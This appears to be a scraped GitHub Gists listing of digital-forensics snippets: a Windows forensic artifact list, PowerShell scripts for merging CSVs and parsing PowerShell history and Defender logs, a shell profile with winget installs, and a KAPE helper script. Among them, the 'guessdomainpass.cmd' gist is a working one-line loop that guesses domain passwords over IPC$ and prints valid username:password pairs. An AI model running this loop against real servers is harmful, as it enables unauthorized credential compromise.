This is a list of forensic artifacts that can be used by DFIR community to perform cyber investigations.
- XP - c:\windows\setupapi.log
- W7+ - c:\windows\inf\setupapi.dev.log
- c:$Recycle.Bin*
- c:\Recycler*
richaarya
/ Forensic_Artifacts.md
Last active
July 11, 2024 09:08
List of Forensic Artifacts useful for DFIR community.
joswr1ght
/ guessdomainpass.cmd
Last active
August 11, 2022 18:11
Windows CMD Loop to Guess Passwords - edit SERVERIP in both places, using your target server IP. Set the DOMAIN value to your target domain.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @FOR /F %p in (pass.txt) DO @FOR /F %n in (users.txt) DO @net use \\SERVERIP\IPC$ /user:DOMAIN\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\SERVERIP\IPC$ > NUL |
svch0stz
/ Merge-CSVFiles.ps1
Last active
August 31, 2020 00:23
Merge-CSVFiles: PowerShell Function to Merge a Folder of CSVs and Append a Filename column
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Usage: Merge-CSVFiles | |
| # Usage: Merge-CSVFiles -Path C:\files\to\merge\ -Filter "*.csv" -OutputFile C:\Temp\merged.csv | |
| # Combination of https://declanbright.com/downloads/Combine-Files.ps1 and https://gallery.technet.microsoft.com/scriptcenter/CombineMerge-multiple-CSV-23a53e83 | |
| function Merge-CSVFiles { | |
| [cmdletbinding()] | |
| param( | |
| [string]$Path = ".", | |
| [string]$Filter = "*.csv", | |
| [string]$OutputFile = "c:\Temp\Merged_$(get-date -f yyyy-MM-dd_HHmmss).csv" |
EricZimmerman
/ $profile
Last active
July 9, 2024 03:32
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| oh-my-posh init pwsh --config "$env:POSH_THEMES_PATH\powerlevel10k_rainbow.omp.json" | Invoke-Expression | |
| Import-Module -Name Terminal-Icons | |
| Set-PSReadLineOption -PredictionViewStyle ListView | |
| Set-PSReadLineOption -PredictionSource history |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| mkdir c:\github | |
| winget install --id=Git.Git -e --accept-package-agreements --accept-source-agreements | |
| winget install --id=Microsoft.VisualStudioCode -e | |
| winget install --id=AgileBits.1Password -e | |
| winget install --id=7zip.7zip -e | |
| winget install --id=Twilio.Authy -e | |
| winget install --id=Bethesda.Launcher -e | |
| winget install --id=Microsoft.Bicep -e | |
| winget install --id=Microsoft.bitsmanager -e | |
| winget install --id=BrutalChess.BrutalChess -e |
Beercow
/ kape_info.py
Created
November 1, 2022 13:11
Python script to dump all fields in KAPE targets and modules, including documentation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import csv | |
| import yaml | |
| import argparse | |
| import os | |
| import sys | |
| filenames = [] | |
| def main(): |
Qazeer
/ ConvertPSHistoryTo-CSV.ps1
Created
July 6, 2023 22:38
Convert PowerShell ConsoleHost_history.txt files from the specified Source Directory into a single CSV file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .SYNOPSIS | |
| Convert PowerShell ConsoleHost_history.txt files from the specified Source Directory into a single CSV file. | |
| Original script to copy the ConsoleHost_history.txt files from Andrew Rathbun and Matt Arbaugh: https://github.com/AndrewRathbun/DFIRPowerShellScripts/blob/main/Move-KAPEConsoleHost_history.ps1 | |
| .PARAMETER InputDir | |
| Specify the folder which contains the ConsoleHost_history.txt file(s). Ideally, the C:\ or C:\Users|Utilisateurs|Usuarios|Benutzer directory in order to grab the file(s) from all users. | |
| .PARAMETER Destination | |
| Specify the folder where the ConsoleHost_histories.csv file will be placed. |
Qazeer
/ ConvertWindowsDefenderMPLogTo-CSV.ps1
Created
August 6, 2023 05:58
Roughly parse a Windows Defender MPLog file into a CSV file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [CmdletBinding()] | |
| param | |
| ( | |
| [Parameter(Mandatory = $true, | |
| Position = 1, | |
| HelpMessage = 'Specify the Microsoft Defender MPLog file to parse.')] | |
| [String]$InputFile, | |
| [Parameter(Mandatory = $true, | |
| Position = 2, | |
| HelpMessage = 'Specify the folder where the output file will be placed.')] |